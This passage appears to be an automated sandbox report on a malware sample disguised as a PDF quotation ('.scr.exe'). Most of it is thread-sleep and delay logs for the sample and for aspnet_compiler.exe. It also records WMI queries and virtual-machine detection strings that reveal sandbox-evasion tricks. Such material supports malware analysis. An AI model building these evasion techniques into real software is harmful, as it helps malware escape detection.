Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99123s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -99014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -98905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -98796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -98605s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -98499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -98233s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -97031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96592s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -96046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95825s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95479s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -95031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -94921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -94811s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -94702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -94593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872	Thread sleep time: -94484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7156	Thread sleep count: 1208 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599855s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7156	Thread sleep count: 8651 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599748s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599629s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598952s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598260s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597496s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596510s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595952s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228	Thread sleep time: -594531s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99123	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99014	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98905	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98796	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98605	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98499	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98233	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97796	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97468	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97250	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97140	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97031	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96921	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96812	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96703	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96592	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96484	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96375	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96265	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96156	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96046	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95937	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95825	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95718	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95479	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95359	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95249	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95140	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95031	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94921	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94811	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94702	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94593	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599855	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599748	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599629	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598260	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596510	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595186	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594531	Jump to behavior

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
